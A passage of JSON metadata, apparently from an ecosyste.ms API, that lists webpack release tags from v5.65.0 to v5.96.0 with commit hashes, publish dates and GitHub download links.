":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ec